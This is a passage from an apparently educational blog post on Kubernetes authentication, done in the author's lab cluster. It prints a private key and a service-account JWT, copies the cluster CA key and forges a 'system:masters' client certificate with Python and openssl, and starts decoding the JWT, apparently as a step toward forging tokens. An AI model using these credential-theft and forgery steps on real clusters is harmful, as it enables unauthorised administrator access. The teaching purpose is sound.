H2hJRqfGs8egLTS79PLvqdlrvv/0hwTYuQuh5fNYnRFFpGTkxTuol/5cAZigBDki
KkGG6PTvGkbEgzA3ox6HrIcpVMHzDw4Q8T8ELQIDAQABAoIBADifhhuYUHVAUsF0
pYnRAdo8/uNkKPl63zPJNVABkFkZiPJj/9QU3/XoGiHPyMJXFrZtEgjBap3JIbzr
2BSwK6yInmhbCDA+BGmIl79bakIy5ILbgMiZCDhumPmqh4VF2M7NPhDv9cJMYB3P
K9qqum8pCmU8SeY42a0sJ6zgLZ65mv/ZpUbkD5W0kErCmrWVapkoGGS3+hEfgLnU
7Zi0Zd1Jm8DZAqPZf0v+lDq4Q6P6pTrZFaHtJyq5GpZhnKw1QIP/d38JGkZbvl6S
gKudDdtwQkKX8EsxsPIspqXZiIFtGlGxR3VOyRiz5ZR/L5PP6/HvyB6U1S3SC2um
0g5Moq0CgYEA5P7+rzb8tZAPC7Lu00rnByFKUj2YEJSxp//0DKnXkfq6vkMpfj5O
Q4//qRq0PlMyHlQwtZdUwfoDZzmmIFFbCnp8haiygrU2WUf4dsF8eQ17COTxTDi3
wj/vy1smiL68EH23Myoxb+WjdZeBJATRKNiX1olqEPNqVTkwmSfIvoMCgYEA4eRw
YCi++jRupLC3oAoc6VMOsfYIvHaLnbBLtIUYZqiiNMjjuPrgHM/rtBspObhVH+iu
NgF+KjLkVlcDqwSnCm/pGhT+WxXUv3iF4GId9rnbaXQnIHo3KZNzW4JX2uogtvaZ
5MKrbTx8BzcDhH01FtKA3UrpaSMOo7xvnUTNs48CgYEAkNCldV7bv2JD8Y0NtXdn
1L17x7iGAu5Vzz1xM9Twq7OZBxtoERsL2XQmJOXrWIK6bi2lxCDYi/c00cHGSifI
4D6HousFQN2iaiG2gjtoIRGiXgSSiDZSFzjhx4N0QgQE4JTwFx42t2HM1l+iXonh
T+hxVU3/UortEsog7qoXLEsCgYBKxzOIMZTfAQJrlHCFEzP07WDc+qRztw6K2fSF
wtWMDmD79lCkSLBt+Up+qcsg52uOj5k0GZRpZcV+63k0YOrnIprY3oBBKN3vsHcp
C3H93hLLOv9E2hBuu/ghH+nzdzPzPXk+aE8Vb0NjpAuPDV/IuVCdcRIJkuhivZt5
RXCO8wKBgCETe5noq0TG/lUHTgaU4/yAv/+f79k9S9l8klqGdOJpYeVQTwoJ6uoZ
FwT0hWawc+sRYtFxlX1HsWhnZcKmX78lI3jKD1paukeDaV1sCJxByHYUR9svic9f
ezKYTwBKSK7cOi5O4YOWru7nyM5WtHG7nBVx16bShrQ/cssp7Qeq
-----END RSA PRIVATE KEY-----
</code></pre></div></div>
<p>OK, this appears to be an RSA private key, and it’s likely this key is associated with the client certificate we just viewed.</p>
<p>Let’s parse it in openssl to confirm this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl rsa -in client.key -noout -text
Private-Key: (2048 bit, 2 primes)
modulus:
00:ca:10:75:78:66:df:eb:44:d1:d7:d1:5f:41:65:
e8:51:f2:d4:31:80:03:16:ed:ad:d2:4f:d5:4e:5d:
d1:73:7c:d4:53:89:fd:a1:a3:94:d0:d0:c2:66:5e:
f6:d7:eb:f1:13:f1:c9:be:ab:eb:f8:bf:77:96:95:
4e:80:46:7b:c3:e5:8e:4b:6e:de:6f:f7:24:c0:9a:
5b:4d:ac:69:bd:77:f5:b5:88:fa:a2:7a:18:14:80:
a7:63:d0:74:6b:a1:e8:ba:df:da:81:4d:c0:29:11:
5c:4b:e0:85:10:95:0e:9e:fc:be:f2:ab:5c:62:73:
9d:00:66:e2:c1:56:f2:ac:26:52:95:45:0f:da:fa:
3d:72:2a:7f:69:00:65:24:ec:f8:2b:c9:bd:46:4c:
61:47:50:16:a9:3b:8d:04:32:d8:e4:b4:52:b8:7b:
0d:63:88:0d:3b:68:f2:de:a3:63:47:4a:8a:0c:48:
28:1f:68:49:46:a7:c6:b3:c7:a0:2d:34:bb:f4:f2:
ef:a9:d9:6b:be:ff:f4:87:04:d8:b9:0b:a1:e5:f3:
58:9d:11:45:a4:64:e4:c5:3b:a8:97:fe:5c:01:98:
a0:04:39:22:2a:41:86:e8:f4:ef:1a:46:c4:83:30:
37:a3:1e:87:ac:87:29:54:c1:f3:0f:0e:10:f1:3f:
04:2d
publicExponent: 65537 (0x10001)
[....SNIP....]
</code></pre></div></div>
<p>I’ve truncated the output above in the interests of space to show the relevant parts of the key - the public modulus and exponent, which are the same values as shown in the <code class="language-plaintext highlighter-rouge">Subject Public Key Info</code> field from the client certificate. This tells us that the client key and certificate we have are associated.</p>
<p>Visually comparing the large text representations of the modulus in the certificate and key openssl outputs like we just did to confirm they match is potentially error prone, so there’s a more robust approach we can use to do this more definitively.</p>
<p>We can extract the modulus of the public key from each file, hash it using a secure algorithm, and then compare the much shorter hash outputs to confirm they match. Here is how that looks using the <code class="language-plaintext highlighter-rouge">sha256</code> algorithm:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl rsa -modulus -noout -in client.key | openssl sha256
SHA256(stdin)= b357a8d244376e9a6a606583df4ea37114c8ff838241479cfe8a57fe76dadb0c
stephen@kubemaster:~/certs$ openssl x509 -modulus -noout -in client.crt | openssl sha256
SHA256(stdin)= b357a8d244376e9a6a606583df4ea37114c8ff838241479cfe8a57fe76dadb0c
</code></pre></div></div>
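<p>The same comparison can also be sketched in Python with the <code class="language-plaintext highlighter-rouge">cryptography</code> library, comparing the public numbers directly instead of hashing them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Sketch: confirm client.key matches client.crt
from cryptography import x509
from cryptography.hazmat.primitives import serialization

key = serialization.load_pem_private_key(open('client.key', 'rb').read(), password=None)
cert = x509.load_pem_x509_certificate(open('client.crt', 'rb').read())

# True if the modulus and exponent in the key and certificate are identical
print(key.public_key().public_numbers() == cert.public_key().public_numbers())
</code></pre></div></div>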
<p>So we have a client X.509 certificate intended for TLS client authentication, as well as the associated private key, and we know that the certificate is trusted by the “kubernetes” CA. What is the significance of this?</p>
<p>Let’s see what happens if we try and make a request to the API server address we got from our config file directly in curl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl https://kubemaster.thezoo.local:6443/api
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: https://curl.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
</code></pre></div></div>
<p>OK, this is suggesting that the certificate used by the API server’s TLS configuration is not trusted by curl’s certificate store.</p>
<p>What if we try again, but we tell curl to use our CA certificate from the config file to verify the remote TLS service?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cacert ca.crt https://kubemaster.thezoo.local:6443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {},
"code": 403
}
</code></pre></div></div>
<p>Now the TLS session works fine, but we are getting a forbidden error message from the API server.</p>
<p>What if we try again, but this time perform TLS client authentication using our extracted client certificate and key?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cacert ca.crt --cert client.crt --key client.key https://kubemaster.thezoo.local:6443/
{
"paths": [
"/.well-known/openid-configuration",
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/apiextensions.k8s.io",
[....SNIP....]
</code></pre></div></div>
<p>Now we are authenticated to the API server!</p>
<h2 id="from-the-documentation">From the documentation…</h2>
<p>So all of this analysis was basically a really long-winded way of verifying that Kubernetes uses TLS client certificate based authentication to identify users.</p>
<p>Indeed, if you read the <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/">authentication documentation</a> I referenced earlier in this post, it will tell you exactly that. Hopefully, though, this process of analysing the various components and seeing how they are inter-related has helped you understand how this works, and how to identify when it might be in use in other systems that are not as well documented.</p>
<p>The documentation also says something else that’s quite interesting:</p>
<blockquote>
<p>In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call.</p>
<p>Even though a normal user cannot be added via an API call, any user that presents a valid certificate signed by the cluster’s certificate authority (CA) is considered authenticated. In this configuration, Kubernetes determines the username from the common name field in the ‘subject’ of the cert (e.g., “/CN=bob”). From there, the role based access control (RBAC) sub-system would determine whether the user is authorized to perform a specific operation on a resource. For more details, refer to the normal users topic in certificate request for more details about this.</p>
</blockquote>
<p>Looking at the Subject value from our client certificate <code class="language-plaintext highlighter-rouge">O = system:masters, CN = kubernetes-admin</code> - this is the value that’s being referred to here. The username we log on as with our certificate is <code class="language-plaintext highlighter-rouge">kubernetes-admin</code>, and <code class="language-plaintext highlighter-rouge">system:masters</code> is presented to the authorization system to determine what we can do.</p>
<h2 id="forging-user-certificates">Forging user certificates</h2>
<p>Something the documentation does not explicitly say is that if we can get our hands on the key associated with the Kubernetes root CA certificate, we can create our own arbitrary client certificates (although once you understand how X.509 systems work this conclusion is straightforward).</p>
<p>The <code class="language-plaintext highlighter-rouge">kube-controller-manager</code> pod has access to this key, which is referred to as the <code class="language-plaintext highlighter-rouge">cluster-signing-key-file</code>. The runtime configuration of the pod will tell you where the key is being accessed from.</p>
<p>We can find this location by first getting the name of the correct pod (which will be different depending on the domain name of your Kubernetes host).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ kubectl -n kube-system get pods | grep controller-manager
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 7d5h
</code></pre></div></div>
<p>Then get the appropriate runtime configuration setting using a command like the following (substitute the name of your controller-manager in the command below, mine is <code class="language-plaintext highlighter-rouge">kube-controller-manager-kubemaster.thezoo.local</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ kubectl -n kube-system describe pods kube-controller-manager-kubemaster.thezoo.local | grep cluster-signing-key-file
--cluster-signing-key-file=/etc/kubernetes/pki/ca.key
</code></pre></div></div>
<p>Let’s take a local copy of the key and check it to confirm the key matches the CA certificate by using the public modulus hash comparison approach used above.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ sudo cp /etc/kubernetes/pki/ca.key .
stephen@kubemaster:~/certs$ sudo chown stephen:stephen ca.key
stephen@kubemaster:~/certs$ openssl rsa -modulus -noout -in ca.key | openssl sha256
SHA256(stdin)= a6f3d5be9a4e70fbac48dbdf7427bfae278106ba001db3340b3e608f2288efed
stephen@kubemaster:~/certs$ openssl x509 -modulus -noout -in ca.crt | openssl sha256
SHA256(stdin)= a6f3d5be9a4e70fbac48dbdf7427bfae278106ba001db3340b3e608f2288efed
</code></pre></div></div>
<p>The hashes match - we can use this key to create our own authentication certificates.</p>
<p>Forging an X.509 certificate that will work with Kubernetes using only openssl is a little more awkward than I would like, so I created a file with a number of Python helper functions to make it easier. Most of it is boilerplate stuff that works with keys and certificates to convert them between files on disk and Python objects, with the unique work being done by a function named <code class="language-plaintext highlighter-rouge">create_certificate</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">create_certificate</code> function creates a new X.509 certificate with all the static fields and values expected by Kubernetes for a client certificate (a rough sketch of equivalent logic is shown after the following list), with some of the more specific steps being that it:</p>
<ul>
<li>Sets the Subject with the Common Name matching our chosen username and Organization Names matching our desired roles;</li>
<li>Sets the Issuer of our certificate to match the Subject from the CA’s certificate;</li>
<li>Sets the Authority Key Identifier to match the ID of the CA’s public key;</li>
<li>Signs the certificate using the CA’s private key; and</li>
<li>Optionally performs signature verification and Issuer-Subject matching of the new certificate against the CA certificate.</li>
</ul>
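<p>For illustration, here is a rough sketch of equivalent logic using the <code class="language-plaintext highlighter-rouge">cryptography</code> library’s X.509 builder - the actual helper in <code class="language-plaintext highlighter-rouge">crypto_helpers.py</code> differs in its details (and the function name below is just illustrative), but the core steps look like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Sketch of forging a Kubernetes client certificate (illustrative only)
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID
from cryptography.hazmat.primitives import hashes

def forge_client_cert(public_key, ca_private_key, ca_cert, common_name, org_names):
    # Subject carries the username (CN) and group/role names (O)
    subject = x509.Name(
        [x509.NameAttribute(NameOID.ORGANIZATION_NAME, o) for o in org_names]
        + [x509.NameAttribute(NameOID.COMMON_NAME, common_name)]
    )
    now = datetime.datetime.utcnow()
    builder = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(ca_cert.subject)   # Issuer matches the CA's Subject
        .public_key(public_key)         # public half of our new keypair
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=365))
        .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False)
        # Authority Key Identifier derived from the CA's public key
        .add_extension(
            x509.AuthorityKeyIdentifier.from_issuer_public_key(ca_cert.public_key()),
            critical=False,
        )
    )
    # Sign the new certificate with the CA's private key
    return builder.sign(ca_private_key, hashes.SHA256())
</code></pre></div></div>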
<p>The following steps will get the code and set up a Python venv that we can use on our Ubuntu system to do the forging. (The venv setup is necessary as the Kubernetes setup guide referenced above installs a version of the Python cryptography library that is incompatible with this code).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ wget https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/master/example_code/crypto_helpers.py
stephen@kubemaster:~/certs$ sudo apt -y install python3-pip python3.10-venv
stephen@kubemaster:~/certs$ python3 -m venv crypto
stephen@kubemaster:~/certs$ source crypto/bin/activate
(crypto) stephen@kubemaster:~/certs$ pip install PyJWT cryptography ipython
</code></pre></div></div>
<p>From here we are going to be running the appropriate functions to do the client certificate forgery from within iPython. You can see <a href="https://thegreycorner.com/2023/08/16/iPython-for-cyber-security.html">this blog post</a> for some more background info on doing security stuff in iPython if you’re interested.</p>
<p>The following commented iPython session shows the steps required to use the <code class="language-plaintext highlighter-rouge">create_certificate</code> function to create a forged certificate and write its output to disk in the present working directory as <code class="language-plaintext highlighter-rouge">forged.crt</code> and <code class="language-plaintext highlighter-rouge">forged.key</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ ipython
Python 3.10.12 (main, Jun 11 2023, 05:26:28) [GCC 11.4.0]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.17.2 -- An enhanced Interactive Python. Type '?' for help.
In [1]: # read file containing helper functions into Python memory
In [2]: exec(open('crypto_helpers.py').read())
In [3]: # create a new private key
In [4]: forged_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
In [5]: # get the public key from the new private key
In [6]: forged_public_key = forged_private_key.public_key()
In [7]: # read the CAs private key from disk
In [8]: ca_private_key = private_key_from_file('ca.key')
In [9]: # read the CA certificate from disk
In [10]: ca_cert = cert_from_file('ca.crt')
In [11]: # create a forged certificate associated with our new key for 'stephen' with highly privileged roles 'system:masters'
In [12]: forged_cert = create_certificate(forged_public_key, ca_private_key, ca_cert, common_name='stephen', org_names = ['system:masters'])
In [13]: # write forged cert to disk as 'forged.crt'
In [14]: cert_to_disk(forged_cert, 'forged.crt')
In [15]: # write new private key to disk as 'forged.key'
In [16]: private_key_to_disk(forged_private_key, 'forged.key')
In [17]: exit
</code></pre></div></div>
<p>Now we have our forged key and certificate on disk, let’s try them with curl to confirm they work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl --cert forged.crt --key forged.key --cacert ca.crt https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>We have now successfully created our own X.509 client authentication certificate for Kubernetes!</p>
<h1 id="service-account-jwt-based-authentication">Service account JWT based authentication</h1>
<p>Next let’s look at the other most commonly used Kubernetes authentication scenario - service accounts used by system entities. Unlike people accounts, these need to be added to the Kubernetes system, with permissions assigned, before they can be used - we can’t just make up our own arbitrary names and assign permissions like we just did with user accounts. In addition, service accounts are bound to particular namespaces, unlike normal user accounts, which are cluster wide - something we need to consider when authenticating.</p>
<p>We will explore service account authentication via the medium of the <code class="language-plaintext highlighter-rouge">default:default</code> service account (i.e. the account named <code class="language-plaintext highlighter-rouge">default</code> in the <code class="language-plaintext highlighter-rouge">default</code> namespace). This account exists in a base install and will be automatically mounted for use by running pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace.</p>
<p>To make it a bit easier to tell whether we are authenticated as it or not, we are going to grant this account some additional permissions it does not normally have - view access to resources in the <code class="language-plaintext highlighter-rouge">default</code> namespace.</p>
<p>We can do this like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl create rolebinding default-view --clusterrole=view --serviceaccount=default:default --namespace=default
rolebinding.rbac.authorization.k8s.io/default-view created
</code></pre></div></div>
<h2 id="using-the-service-account-from-within-a-pod">Using the service account from within a pod</h2>
<p>Now we are going to gain access to a running pod in the <code class="language-plaintext highlighter-rouge">default</code> namespace in order to use this service account.</p>
<p>First let’s identify our running pods in this namespace. Here are mine, created as part of the setup tutorial linked earlier.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-app-5777b5f95-97489 1/1 Running 0 3h55m
nginx-app-5777b5f95-tfwt5 1/1 Running 0 3h55m
</code></pre></div></div>
<p>We will access the first pod in the list - <code class="language-plaintext highlighter-rouge">nginx-app-5777b5f95-97489</code>. First we will copy the <code class="language-plaintext highlighter-rouge">kubectl</code> command line tool into the pod so we can easily query the Kubernetes API from within the pod using the service account credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl cp `which kubectl` nginx-app-5777b5f95-97489:/usr/bin/
</code></pre></div></div>
<p>Now let’s open a bash shell in the pod.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl exec -it nginx-app-5777b5f95-97489 -- /bin/bash
root@nginx-app-5777b5f95-97489:/#
</code></pre></div></div>
<p>Let’s list pods from the container. Note we can see pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace (used if no namespace is explicitly named), but we cannot see them in the <code class="language-plaintext highlighter-rouge">kube-system</code> namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-app-5777b5f95-97489 1/1 Running 0 3h58m
nginx-app-5777b5f95-tfwt5 1/1 Running 0 3h58m
root@nginx-app-5777b5f95-97489:/# kubectl get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-system"
</code></pre></div></div>
<p>Also note, there is no kubectl config file like we had on the host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# ls ~/.kube/config
ls: cannot access '/root/.kube/config': No such file or directory
</code></pre></div></div>
<p>How then is <code class="language-plaintext highlighter-rouge">kubectl</code> finding the API server and authenticating?</p>
<p>There are actually a few ways that the Kubernetes API server can be located from within a container.</p>
<p>The first is via DNS. Kubernetes will create a <code class="language-plaintext highlighter-rouge">kubernetes</code> service in the <code class="language-plaintext highlighter-rouge">default</code> namespace to allow the API server to be easily discovered. This will have an <code class="language-plaintext highlighter-rouge">A</code> record giving the internal cluster address of the API server at address <code class="language-plaintext highlighter-rouge">kubernetes.default.svc.cluster.local</code>, and an <code class="language-plaintext highlighter-rouge">SRV</code> record giving the internal port of the service (usually 443) at address <code class="language-plaintext highlighter-rouge">_https._tcp.kubernetes.default.svc.cluster.local</code>.</p>
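<p>As a quick example, you could confirm the <code class="language-plaintext highlighter-rouge">A</code> record from inside a pod that has Python available (not all containers will) like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Resolves via the cluster DNS service configured in the pod's /etc/resolv.conf
import socket
print(socket.gethostbyname('kubernetes.default.svc.cluster.local'))
</code></pre></div></div>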
<p>The second is via environment variables with <code class="language-plaintext highlighter-rouge">KUBERNETES</code> in the name, as shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# env | grep KUBERNETES
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
</code></pre></div></div>
<p>The credentials are provided to the container via a tmpfs mount configured automatically by Kubernetes when it runs the pod. You can see this using the mount command. The default path is <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# mount | grep serviceaccount
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime,size=3902996k,inode64)
</code></pre></div></div>
<p>This folder contains 3 files, as shown below (I have added some spacing between commands in the output below to make things a little more readable).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# ls /run/secrets/kubernetes.io/serviceaccount/
ca.crt namespace token
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
-----BEGIN CERTIFICATE-----
MIIDBTCCAe2gAwIBAgIIBy6KdfKkQ3gwDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0zMzExMDUwMTI1NDZaMBUx
EzARBgNVBAMTCmt1YmVybmV0ZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQC+lUi8cHdUbcbHUbFY2fCWxQ4+On9jV4isqXeuysD+hvT4PaY9TM/OzOwP
OA1YmyhSTrADlS+jjqfx/O73cE15Sw5JoW3JyTmmo8sp1E8ODB0U7YtOVirRBMen
lkJSKP9BMTMNaInEbH/8zP5I/Y5lcIVGy6b1BYsG/+/Bwj4bAPgm7ZQfkhkyqY2j
jxcUh0/H5bUFXeFdyFhhqxIvHaDsKG5bhVHREmuLSJsoTG8ygD/i3nhtkxF0KHxj
A1+QKdDjaTYajnacnZ2jG+AFENMC2NYw3rAMX/P54Np6P9JkukCS+XK2lCvb3PIq
SadMIj+lITTjezbgcw2cv2A+6B5DAgMBAAGjWTBXMA4GA1UdDwEB/wQEAwICpDAP
BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgYbD4N8i7PgpS7OKuEb5xlEHEnDAV
BgNVHREEDjAMggprdWJlcm5ldGVzMA0GCSqGSIb3DQEBCwUAA4IBAQAUjRiaXfQN
aE45Vcw52/bXev/7ZZq7Nd/k8CFygKNr2rmiNQcIkI71qvILDxFhOsNUhaITGQNZ
dYOfg7D976agn1HtcAAm9IIEAihnu9SLXW4sQvXpWXG+zSNzd21JDKD/Yyr2nCTM
+6jMSQbl9gGOjXCuES4f7jyjEtUDHyttiCxRDUnzSoporlG8j/xzhP8iZHCzRVGP
in9a/iEx9ReCNrnsKSH7JuAfX0YzLAAJx5JWA4j3qoI2bPgAv/naUOiJckYZTuks
wdBrTDRT8krq8JgcBLBDkV6nUD45+llHAB8GunHXdtIXw4tKtBuLgxk44KUQJdov
xwf5rtvfVj66
-----END CERTIFICATE-----
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/namespace
default
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token
eyJhbGciOiJSUzI1NiIsImtpZCI6IlNNVFRFSHNnOVoxcVNZZzd6d3hnZTZPcDczWHVFZHYxY19BcFEwQVh6REkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzMxNTY0OTY2LCJpYXQiOjE3MDAwMjg5NjYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueC1hcHAtNTc3N2I1Zjk1LTk3NDg5IiwidWlkIjoiNTJhNzEwNWEtZmNmZi00OWMyLTk3NTktMTgxNWJkMDc4ZmQ3In0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiZGZhMTNjZWItNTE2MC00YTFhLTk4MDMtMDQ5ZTQ4NzNhNjA5In0sIndhcm5hZnRlciI6MTcwMDAzMjU3M30sIm5iZiI6MTcwMDAyODk2Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZGVmYXVsdCJ9.uk7ccvYio_a8lwLk_PAPlxf7HHRuVqvuStTNIzKfwRI4NASgs6Ywn8dBpgYSoyhnYbSKJ6rVb0WsvbfFJMUE4uUUv8RqeaJFiNvRjx2JIkLL6BDp_HAaLGAg257pPj-PrHjCAL2ANEy604rIotAietyEytEBgmRjgA2IRVRsQdSCPaq_PPbBmpPrBo0Uv9wEpFObPpp_31cmzVgYJSvyrAEkHK33EY5wgNLmv2WF-IbEkj57AgBC_D3uGCOZWmjXCaNyhlWOSgVb8nGCnC63QzP1BnMvBkF6W6XnoxG04KWUzTAQxmORnXqtxUPgAEvGsXBFKVt9mKnGD4aWmJBNPA
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">ca.crt</code> is the same Kubernetes Certificate Authority certificate used to verify the API server’s TLS certificate, as we saw in the last section.</p>
<p>The <code class="language-plaintext highlighter-rouge">namespace</code> file identifies the namespace that the container is running in.</p>
<p>The <code class="language-plaintext highlighter-rouge">token</code> file is the authentication credentials for the service account, in the form of a JWT.</p>
<p>We can decode the header and claims sections of the JWT to get some more insight into how it works. This basically involves splitting the token on the period (“.”) character and URL-safe base64 decoding the first and second sections of the token, padding with “=” where necessary.</p>
<p>The first part of the token is the header, which usually identifies the algorithm used to sign the JWT and other values that might be used by recipients to parse the token correctly.</p>
<p>The second part contains claim data, the primary content of the JWT, and is usually used to identify a user.</p>
<p>The third part of the JWT contains the signature that verifies the authenticity of the claim and header data and is not useful to us until we want to identify keys and create our own tokens.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token | echo "$(cut -d '.' -f 1)==" | base64 -d
{"alg":"RS256","kid":"SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI"}
root@nginx-app-5777b5f95-97489:/# cat /run/secrets/kubernetes.io/serviceaccount/token | echo "$(cut -d '.' -f 2)==" | base64 -d
{"aud":["https://kubernetes.default.svc.cluster.local"],"exp":1731564966,"iat":1700028966,"iss":"https://kubernetes.default.svc.cluster.local","kubernetes.io":{"namespace":"default","pod":{"name":"nginx-app-5777b5f95-97489","uid":"52a7105a-fcff-49c2-9759-1815bd078fd7"},"serviceaccount":{"name":"default","uid":"dfa13ceb-5160-4a1a-9803-049e4873a609"},"warnafter":1700032573},"nbf":1700028966,"sub":"system:serviceaccount:default:default"}
</code></pre></div></div>
<p>This gives us a lot of information, the most useful of which is:</p>
<ul>
<li>The JWT signing algorithm used, <code class="language-plaintext highlighter-rouge">RS256</code>, which involves signing the JWT with a 2048 bit RSA key (the private key is used to sign and the public key to verify).</li>
  <li>The keyid (kid) of the public key used for verification of the JWT <code class="language-plaintext highlighter-rouge">SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI</code>. This is generated algorithmically from the public key’s contents, and we can use it to confirm we have the correct key for creating our own tokens when we find it.</li>
  <li>Various details of the service account associated with the token, including its name <code class="language-plaintext highlighter-rouge">default</code>, its namespace <code class="language-plaintext highlighter-rouge">default</code> and its uid <code class="language-plaintext highlighter-rouge">dfa13ceb-5160-4a1a-9803-049e4873a609</code>. If we didn’t already know the name of the service account being used, we could work it out from here.</li>
<li>A template of the claim data that is required for a token to be accepted as valid by Kubernetes. Authentication systems using JWTs usually expect specific claim data to be considered valid, and this gives us a working example of what claims might be required.</li>
</ul>
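<p>If you prefer to do this decoding in Python rather than with shell tools, a minimal sketch like the following performs the same split-and-decode, handling the base64 padding automatically (the token path is the standard in-pod location shown earlier):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import base64
import json

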